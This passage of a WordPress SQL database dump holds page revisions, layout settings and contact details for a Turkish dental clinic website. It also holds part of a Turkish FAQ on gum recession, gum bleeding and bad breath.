items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22twitter%22%2C%22url%22%3A%22%23%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]<br />\n<h3>İletişim Bilgileri</h3>\n<p>[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"info@ze-dent.com\" title_tag=\"div\" link=\"url:mailto%3Ainfo%40ze-dent.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]<br />\n<h3>İletişim Formm</h3>\n<p>Soru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform name_field=\"shown\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]</p>\n', 'İletişim', '', 'inherit', 'closed', 'closed', '', '9-autosave-v1', '', '', '2018-07-12 18:08:07', '2018-07-12 15:08:07', '', 9, 'http://www.ze-dent.com/9-autosave-v1/', 0, 'revision', '', 0),
(6211, 1, '2018-07-12 18:08:30', '2018-07-12 15:08:30', '[vc_row height=\"auto\" width=\"full\"][vc_column][us_gmaps marker_address=\"\" marker_text=\"JTNDY2VudGVyJTNFWkVERU5UJTIwJTNDYnIlM0VBJUM0JTlGJUM0JUIxeiUyMHZlJTIwRGklQzUlOUYlMjBTYSVDNCU5RmwlQzQlQjElQzQlOUYlQzQlQjElMjBQb2xpa2xpbmklQzQlOUZpJTNDJTJGY2VudGVyJTNF\" zoom=\"17\" latitude=\"39.922046\" longitude=\"32.853018\" add_markers=\"1\" markers=\"%5B%5D\"][/vc_column][/vc_row][vc_row gap=\"20\"][vc_column width=\"1/3\"][vc_column_text]\r\n<h3>Sosyal Medya</h3>\r\n[/vc_column_text][us_social_links size=\"22px\" items=\"%5B%7B%22type%22%3A%22facebook%22%2C%22url%22%3A%22https%3A%2F%2Fwww.facebook.com%2FZe-Dent-A%25C4%259F%25C4%25B1z-Ve-Di%25C5%259F-Sa%25C4%259Fl%25C4%25B1%25C4%259F%25C4%25B1-Poliklini%25C4%259Fi-1050669254966662%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22twitter%22%2C%22url%22%3A%22%23%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%2C%7B%22type%22%3A%22instagram%22%2C%22url%22%3A%22https%3A%2F%2Fwww.instagram.com%2Fze_dent%22%2C%22icon%22%3A%22fas%7Cstar%22%2C%22color%22%3A%22%231abc9c%22%7D%5D\"][us_separator][vc_column_text]\r\n<h3>İletişim Bilgileri</h3>\r\n[/vc_column_text][us_iconbox icon=\"fas|map-marker-alt\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"İzmir 1 Caddesi Aydın Apartmanı No: 33/22 Kızılay / ANKARA\" title_tag=\"div\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 425 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903124251656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|phone\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"0.312 232 16 56\" title_tag=\"div\" link=\"url:tel%3A%2B903122321656|||\"][/us_iconbox][us_separator size=\"small\"][us_iconbox icon=\"fas|envelope\" style=\"outlined\" iconpos=\"left\" size=\"22px\" title=\"info@ze-dent.com\" title_tag=\"div\" link=\"url:mailto%3Ainfo%40ze-dent.com|||\"][/us_iconbox][/vc_column][vc_column width=\"2/3\"][vc_column_text]\r\n<h3>İletişim Formm</h3>\r\nSoru ve önerilerini aşağıdaki formu doldurarak bize iletebilirsiniz.[/vc_column_text][us_cform name_field=\"shown\" captcha_field=\"required\" button_style=\"outlined\"]I consent to the processing and storage of my personal data[/us_cform][/vc_column][/vc_row]', 'İletişim', '', 'inherit', 'closed', 'closed', '', '9-revision-v1', '', '', '2018-07-12 18:08:30', '2018-07-12 15:08:30', '', 9, 'http://www.ze-dent.com/9-revision-v1/', 0, 'revision', '', 0),
(6213, 1, '2018-07-12 18:55:53', '2018-07-12 15:55:53', '<p>[vc_row][vc_column][us_grid items_quantity=\"\" pagination=\"infinite\" items_layout=\"6224\" img_size=\"us_600_400_crop\"][/vc_column][/vc_row]</p>\n', 'Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '3728-autosave-v1', '', '', '2018-07-12 18:55:53', '2018-07-12 15:55:53', '', 3728, 'http://www.ze-dent.com/3728-autosave-v1/', 0, 'revision', '', 0),
(6214, 1, '2018-07-12 18:16:35', '2018-07-12 15:16:35', '[vc_row][vc_column][us_grid items_quantity=\"\" pagination=\"infinite\" img_size=\"us_600_400_crop\"][/vc_column][/vc_row]', 'Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '3728-revision-v1', '', '', '2018-07-12 18:16:35', '2018-07-12 15:16:35', '', 3728, 'http://www.ze-dent.com/3728-revision-v1/', 0, 'revision', '', 0),
(6215, 1, '2018-07-11 15:16:00', '2018-07-11 12:16:00', '', 'FAQ', '', 'publish', 'closed', 'closed', '', 'sidebar-8', '', '', '2018-07-11 15:16:00', '2018-07-11 12:16:00', '', 0, 'http://www.ze-dent.com/us_widget_area/sidebar-8/', 0, 'us_widget_area', '', 0),
(6216, 1, '2018-07-11 15:16:00', '2018-07-11 12:16:00', '', 'Login', '', 'publish', 'closed', 'closed', '', 'sidebar-9', '', '', '2018-07-11 15:16:00', '2018-07-11 12:16:00', '', 0, 'http://www.ze-dent.com/us_widget_area/sidebar-9/', 0, 'us_widget_area', '', 0),
(6218, 1, '2018-07-12 18:23:07', '2018-07-12 15:23:07', '[vc_row][vc_column][us_grid post_type=\"us_portfolio\" columns=\"3\" items_gap=\"4px\" items_quantity=\"\" items_layout=\"portfolio_16\"][/vc_column][/vc_row]', 'Hizmetlerimiz', '', 'inherit', 'closed', 'closed', '', '2253-revision-v1', '', '', '2018-07-12 18:23:07', '2018-07-12 15:23:07', '', 2253, 'http://www.ze-dent.com/2253-revision-v1/', 0, 'revision', '', 0),
(6219, 1, '2018-08-01 15:25:20', '2018-08-01 12:25:20', '[vc_row height=\"large\"][vc_column width=\"1/3\"][us_person image=\"6541\" name=\"ZEKİ ERDOĞAN\" role=\"Kurucu - Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6539\" name=\"Uzm. Dr. Dt. AYŞEGÜL DALKIRAN ARSLAN\" role=\"Ortodontist\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/3\"][us_person image=\"6540\" name=\"DUYGU DEMİR\" role=\"Diş Hekimi\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][/vc_row][vc_row content_placement=\"middle\" height=\"auto\"][vc_column][us_separator type=\"fullwidth\" size=\"small\" thick=\"3\" text=\"Dental Asistanlarımız\"][/vc_column][/vc_row][vc_row height=\"large\"][vc_column width=\"1/4\"][/vc_column][vc_column width=\"1/4\"][us_person image=\"6546\" name=\"SEVİNÇ PEKBAK\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][us_person image=\"6545\" name=\"SONGÜL EVCİ\" role=\"Asistan\" link=\"|||\" email=\"ze-dent@hotmail.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column][vc_column width=\"1/4\"][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-autosave-v1', '', '', '2018-08-01 15:25:20', '2018-08-01 12:25:20', '', 1194, 'http://www.ze-dent.com/1194-autosave-v1/', 0, 'revision', '', 0),
(6222, 1, '2018-07-12 18:45:35', '2018-07-12 15:45:35', '[vc_row height=\"large\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"10/12\"][vc_row_inner][vc_column_inner width=\"1/2\"][us_person image=\"6221\" name=\"Zeki ERDOĞAN\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column_inner][vc_column_inner width=\"1/2\"][us_person image=\"6220\" name=\"Ayşegül DALKIRAN ARSLAN\" role=\"Doktor (Ortodontist)\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/12\"][/vc_column][/vc_row]', 'Meet the Team', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-12 18:45:35', '2018-07-12 15:45:35', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6223, 1, '2018-07-12 18:46:11', '2018-07-12 15:46:11', '[vc_row height=\"large\"][vc_column width=\"1/12\"][/vc_column][vc_column width=\"10/12\"][vc_row_inner][vc_column_inner width=\"1/2\"][us_person image=\"6221\" name=\"Zeki ERDOĞAN\" role=\"Diş Hekimi\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column_inner][vc_column_inner width=\"1/2\"][us_person image=\"6220\" name=\"Ayşegül DALKIRAN ARSLAN\" role=\"Doktor (Ortodontist)\" link=\"|||\" email=\"info@ze-dent.com\" facebook=\"https://www.facebook.com/Ze-Dent-A%C4%9F%C4%B1z-Ve-Di%C5%9F-Sa%C4%9Fl%C4%B1%C4%9F%C4%B1-Poliklini%C4%9Fi-1050669254966662\"][/us_person][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/12\"][/vc_column][/vc_row]', 'Hekimlerimiz', '', 'inherit', 'closed', 'closed', '', '1194-revision-v1', '', '', '2018-07-12 18:46:11', '2018-07-12 15:46:11', '', 1194, 'http://www.ze-dent.com/1194-revision-v1/', 0, 'revision', '', 0),
(6224, 1, '2018-07-12 18:54:27', '2018-07-12 15:54:27', '{\"title\":\"Blog Klasik\",\"data\":{\"post_image:1\":{\"media_preview\":1,\"design_options\":{\"margin_bottom_default\":\"1rem\"},\"link\":\"post\",\"custom_link\":[],\"placeholder\":0,\"circle\":0,\"thumbnail_size\":\"large\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_title:1\":{\"design_options\":{\"margin_bottom_default\":\"0.5rem\"},\"link\":\"post\",\"custom_link\":[],\"color_link\":1,\"font\":\"heading\",\"text_styles\":[],\"font_size\":\"1.2rem\",\"font_size_mobiles\":\"\",\"line_height\":\"\",\"line_height_mobiles\":\"\",\"tag\":\"h2\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_date:1\":{\"font_size\":\"0.9rem\",\"icon\":\"far|clock\",\"type\":\"published\",\"format\":\"default\",\"format_custom\":\"F j, Y\",\"text_styles\":[],\"font_size_mobiles\":\"\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_author:1\":{\"font_size\":\"0.9rem\",\"icon\":\"far|user\",\"link\":\"author_page\",\"custom_link\":[],\"color_link\":1,\"text_styles\":[],\"font_size_mobiles\":\"\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_comments:1\":{\"font_size\":\"0.9rem\",\"icon\":\"far|comments\",\"number\":0,\"link\":\"post\",\"custom_link\":[],\"color_link\":1,\"text_styles\":[],\"font_size_mobiles\":\"\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_taxonomy:1\":{\"taxonomy_name\":\"category\",\"font_size\":\"0.9rem\",\"icon\":\"far|folder-open\",\"style\":\"simple\",\"separator\":\", \",\"link\":\"archive\",\"custom_link\":[],\"color_link\":1,\"text_styles\":[],\"font_size_mobiles\":\"\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_taxonomy:2\":{\"taxonomy_name\":\"post_tag\",\"font_size\":\"0.9rem\",\"icon\":\"far|tags\",\"style\":\"simple\",\"separator\":\", \",\"link\":\"archive\",\"custom_link\":[],\"color_link\":1,\"text_styles\":[],\"font_size_mobiles\":\"\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3},\"post_content:1\":{\"design_options\":{\"margin_top_default\":\"0.5rem\"},\"type\":\"excerpt_content\",\"length\":30,\"font_size\":\"\",\"font_size_mobiles\":\"\",\"line_height\":\"\",\"line_height_mobiles\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3}},\"default\":{\"layout\":{\"middle_center\":[\"post_image:1\",\"post_title:1\",\"post_content:1\"],\"hidden\":[]},\"options\":{\"fixed\":0,\"ratio\":\"1x1\",\"ratio_width\":\"21\",\"ratio_height\":\"9\",\"overflow\":0,\"link\":\"none\",\"popup_width\":\"\",\"color_bg\":\"\",\"color_text\":\"\",\"border_radius\":0,\"box_shadow\":0,\"box_shadow_hover\":0}}}', 'Ağız diş Ana Sayfa', '', 'publish', 'closed', 'closed', '', 'layout-11', '', '', '2018-07-12 18:55:47', '2018-07-12 15:55:47', '', 0, 'http://www.ze-dent.com/?post_type=us_grid_layout&#038;p=6224', 0, 'us_grid_layout', '', 0),
(6225, 1, '2018-07-12 18:56:04', '2018-07-12 15:56:04', '[vc_row][vc_column][us_grid items_quantity=\"\" pagination=\"infinite\" items_layout=\"6224\" img_size=\"us_600_400_crop\"][/vc_column][/vc_row]', 'Ağız ve Diş Sağlığı', '', 'inherit', 'closed', 'closed', '', '3728-revision-v1', '', '', '2018-07-12 18:56:04', '2018-07-12 15:56:04', '', 3728, 'http://www.ze-dent.com/3728-revision-v1/', 0, 'revision', '', 0),
(6226, 1, '2018-07-12 18:57:57', '2018-07-12 15:57:57', '{\"title\":\"Portfolyo 16\",\"data\":{\"post_image:1\":{\"link\":\"none\",\"placeholder\":1,\"circle\":1,\"design_options\":{\"position_top_default\":\"0\",\"position_right_default\":\"0\",\"position_bottom_default\":\"0\",\"position_left_default\":\"0\"},\"el_class\":\"grid_corner_image\",\"hover\":1,\"scale\":\"0.3\",\"transition_duration\":\"0.4\",\"custom_link\":[],\"media_preview\":0,\"thumbnail_size\":\"large\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"opacity\":1,\"opacity_hover\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\"},\"vwrapper:1\":{\"design_options\":{\"position_top_default\":\"0\",\"position_right_default\":\"0\",\"position_left_default\":\"0\",\"padding_top_default\":\"8%\",\"padding_right_default\":\"33%\",\"padding_left_default\":\"8%\"},\"hover\":1,\"opacity_hover\":\"0\",\"scale_hover\":\"2\",\"translateX_hover\":\"-50\",\"translateY_hover\":\"-50\",\"transition_duration\":\"0.4\",\"alignment\":\"left\",\"valign\":\"top\",\"bg_gradient\":0,\"color_grad\":\"rgba(30,30,30,0.8)\",\"color_bg\":\"\",\"color_border\":\"\",\"color_text\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"opacity\":1,\"scale\":1,\"translateX\":0,\"translateY\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\"},\"post_title:1\":{\"link\":\"none\",\"color_text\":\"inherit\",\"text_styles\":[\"bold\"],\"custom_link\":[],\"color_link\":1,\"font\":\"heading\",\"font_size\":\"1.2rem\",\"font_size_mobiles\":\"\",\"line_height\":\"\",\"line_height_mobiles\":\"\",\"tag\":\"h2\",\"design_options\":\"\",\"color_bg\":\"\",\"color_border\":\"\",\"width\":\"\",\"border_radius\":0,\"hide_below\":0,\"el_class\":\"\",\"hover\":0,\"opacity\":1,\"opacity_hover\":1,\"scale\":1,\"scale_hover\":1,\"translateX\":0,\"translateX_hover\":0,\"translateY\":0,\"translateY_hover\":0,\"color_bg_hover\":\"\",\"color_border_hover\":\"\",\"color_text_hover\":\"\",\"transition_duration\":0.3}},\"default\":{\"layout\":{\"middle_center\":[\"post_image:1\",\"vwrapper:1\"],\"vwrapper:1\":[\"post_title:1\"],\"hidden\":[]},\"options\":{\"fixed\":1,\"ratio\":\"1x1\",\"ratio_width\":\"21\",\"ratio_height\":\"9\",\"overflow\":0,\"link\":\"post\",\"popup_width\":\"\",\"color_bg\":\"\",\"color_text\":\"\",\"border_radius\":0,\"box_shadow\":0,\"box_shadow_hover\":0}}}', 'Hizmetlerimiz', '', 'publish', 'closed', 'closed', '', 'hizmetlerimiz', '', '', '2018-07-12 18:59:51', '2018-07-12 15:59:51', '', 0, 'http://www.ze-dent.com/?post_type=us_grid_layout&#038;p=6226', 0, 'us_grid_layout', '', 0),
(6227, 1, '2018-07-12 19:00:14', '2018-07-12 16:00:14', '[vc_row][vc_column][us_grid post_type=\"us_portfolio\" columns=\"3\" items_gap=\"4px\" items_quantity=\"\" items_layout=\"6226\"][/vc_column][/vc_row]', 'Hizmetlerimiz', '', 'inherit', 'closed', 'closed', '', '2253-revision-v1', '', '', '2018-07-12 19:00:14', '2018-07-12 16:00:14', '', 2253, 'http://www.ze-dent.com/2253-revision-v1/', 0, 'revision', '', 0),
(6234, 1, '2018-07-13 12:48:53', '2018-07-13 09:48:53', '<iframe width=\"500\" height=\"281\" src=\"https://www.youtube.com/embed/vFg9G2lWV5Q?feature=oembed\" frameborder=\"0\" allow=\"autoplay; encrypted-media\" allowfullscreen></iframe>', '', '', 'publish', 'closed', 'closed', '', 'f08a4e76a44d6451769ea31c09c98dc6', '', '', '2018-07-13 12:48:53', '2018-07-13 09:48:53', '', 0, 'http://www.ze-dent.com/f08a4e76a44d6451769ea31c09c98dc6/', 0, 'oembed_cache', '', 0);
INSERT INTO `zdenl_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(6247, 1, '2018-07-13 12:54:52', '2018-07-13 09:54:52', '[vc_row][vc_column][vc_column_text]<strong>Ağız ve Diş Sağlığı / Sık Karşılaşılan Sorunlar\r\nDişeti çekilmelerinin nedenleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Dişeti çekilmelerinin yaşlanmayla birlikte arttığı gözlenmektedir. Buna ‘fizyolojik dişeti çekilmesi’ denir.</li>\r\n 	<li>Dişlerin normal diş dizisinin dışında yer almaları ve üst ön dişlerin kesici kenarlarının alt ön dişlerin ön yüzeylerindeki dişetine mekanik baskı yapması sonucu dişeti çekilmeleri gözlenebilir.</li>\r\n 	<li>Dişlerin fırçalanması sonucunda dişetlerine sürekli olarak aşırı baskı uygulanması, dişeti çekilmesine neden olur. Böyle hastalarda hastanın ön diş yüzeylerinde bakteriyel plağa rastlanmaz ve çekilme olan bölgelerde dişlerin ön yüzeylerinde aşınmalar görülür.</li>\r\n 	<li>Uygulanan tedavi tekniğine bağlı olarak değişen yüzeylerde dişeti çekilmesi gözlenebilir.</li>\r\n 	<li>Dişler arasına kürdan veya toplu iğne gibi yabancı cisimlerin sürekli olarak sokulması, ilgili bölgedeki dişetinin kök ucuna doğru çekilmesine neden olabilir. Ayrıca bazı bireylerde görülen ve psikosomatik faktörlere bağlanan sebeplerle dişetinin tırnakla kök ucu yönünde itilmesi olayı da dişeti çekilmesine neden olabilir.</li>\r\n 	<li>Diş köklerinin aşırı dış bükey olması dişeti çekilmesinin meydana gelmesini kolaylaştırabilir.</li>\r\n</ul>\r\n<strong>Dişeti çekilmesi nasıl tedavi edilir?</strong>\r\n\r\nBazen basit diş eti çekilmesi sorunu, diş taşı temizliği ile giderilebilir. Ancak ciddi çekilmelerde kendi kendine sağlıklı haline dönmesi mümkün değildir. Öncelikle ilk aşamadaki tedaviler uygulanır, gerekliyse cerrahiye geçilir ve yumuşak doku greftleri kullanılabilir. Bu nedenle dişhekimine başvurup anemnez(sorgulama) sonrası muayene neticesi tedavi şekline karar verilir.\r\n\r\n<strong>Dişeti kanamasının nedenleri nelerdir?</strong>\r\n\r\nDiş etleri kanıyorsa, kanamanın bulunduğu bölgede iltihap var demektir. Bu ‘mikrobiyal dental plak’ denilen diş taşı hastalıklarının nedenlerinden ya da kötü bir dolgu veya kötü bir kronun travmatik etkenlerinden kaynaklanabilir. Sert bir cisim çarpması sonucu da kanamalar oluşabilir ama bunlar geçici diş eti kanamasıdır. Genetik faktörlerin de diş eti kanaması üzerinde etkisi vardır. Ancak birincil faktör her zaman ‘mikrobiyal dental plak’tır, genetik faktörler çoğu zaman bunu destekler. Genetik faktörlerin etkiliği olan bireyde hastalık daha yavaş ilerler, daha uzun sürede daha az tahribat yapar.\r\n\r\n<strong>Dişeti kanaması nasıl tedavi edilir?</strong>\r\n\r\nHastalık, alt taraftaki kemiğe doğru ilerlememişse yani sadece diş etinde ise iyi bir bakım ve ağız hijyeni ile sorun çözülür. Eğer dişetinin altındaki dokulara ulaşmışsa, ortalama hastalığın boyutu 2-3 mm’yi aşmıştır ve diş fırçası ile bu mesafede bir temizlik yapmak mümkün değildir. Bunun için bir dişhekimi vasıtasıyla bu bölgelerin temizlenmesi, tahrip olan dokuların düzeltilmesi, hastalıklı olan dokuların sağlıklı hale getirilmesi gerekir. Her şey kontrol altına alındıktan sonra ise bunun korunması gerekir.\r\n\r\n<strong>Ağız kokusunun nedenleri nelerdir?</strong>\r\n<ul>\r\n 	<li>Diş aralarında, dil üzerinde ve diğer çevre dokularda kalan yiyecek artıkları, ağız içindeki bakteriler aracılığı ile kötü kokulu bileşiklerin oluşmasına sebep olmaktadır.</li>\r\n 	<li>Ağız bakımı eksikliğine bağlı olarak gelişen diş çürükleri ve dişeti hastalıkları tabloyu ağırlaştırmaktadır.</li>\r\n 	<li>İyi temizlenmeyen protezler de benzer şekilde ağız kokusunun daha şiddetli hissedilmesine neden olmaktadır.</li>\r\n 	<li>Bazı ilaçların sürekli kullanımında, tükürük bezleri ile ilgili hastalıklarda veya sürekli ağız solunumu yapan kişilerde, tükürük azlığına bağlı olarak ağız kokusu gelişebilir.</li>\r\n 	<li>Tükettiğimiz bazı yiyecekler (soğan, sarımsak, et, balık, peynir vb.) nefesimizin kötü kokmasına neden olabilir. (Dişlerin ve dilin temizlenmesi ile bu koku ortadan kalkmaz. Kokuya neden olan yiyecek vücuttan bütünüyle atılana dek koku devam edecektir.)</li>\r\n 	<li>Benzer şekilde tütün ürünleri ve alkol de ağız kokusuna neden olurlar.</li>\r\n 	<li>Ağız kokusunun ortaya çıkmasında az da olsa bazı hastalıklar rol almaktadır. Bunlar arasında; şeker hastalığı, alt ve üst solunum yolları enfeksiyonları, sindirim sistemi bozuklukları, karaciğer ve böbrek hastalıkları sayılabilir. (Bunların ağızda oluşturdukları koku ağız içinde bakterilerin neden olduğu kokular gibi olmayabilir. Örneğin, şeker hastalarında ağızdan gelen aseton kokusu söz konusudur.)</li>\r\n</ul>\r\n<strong>Ağız kokusu nasıl giderilir?</strong>\r\n<ul>\r\n 	<li>Ağız içinde çürük dişler, kanayan dişetleri, iyi temizlenmemiş protezler varsa gerekli tedaviler yapılmalıdır.</li>\r\n 	<li>Diş ve dişetleri sağlıklı hale getirildikten sonra bu durumun korunması için düzenli olarak diş fırçası ve diş ipi kullanılmalıdır</li>\r\n 	<li>Ayrıca dilin üzeri de mutlaka fırçalanmalıdır. Bu iş için özel olarak üretilmiş dil fırçalarının kullanılması daha uygundur.</li>\r\n 	<li>Şekersiz sakız çiğneyerek tükürük akışını artırmak, gıda artıklarının temizliğine katkıda bulunacaktır.</li>\r\n 	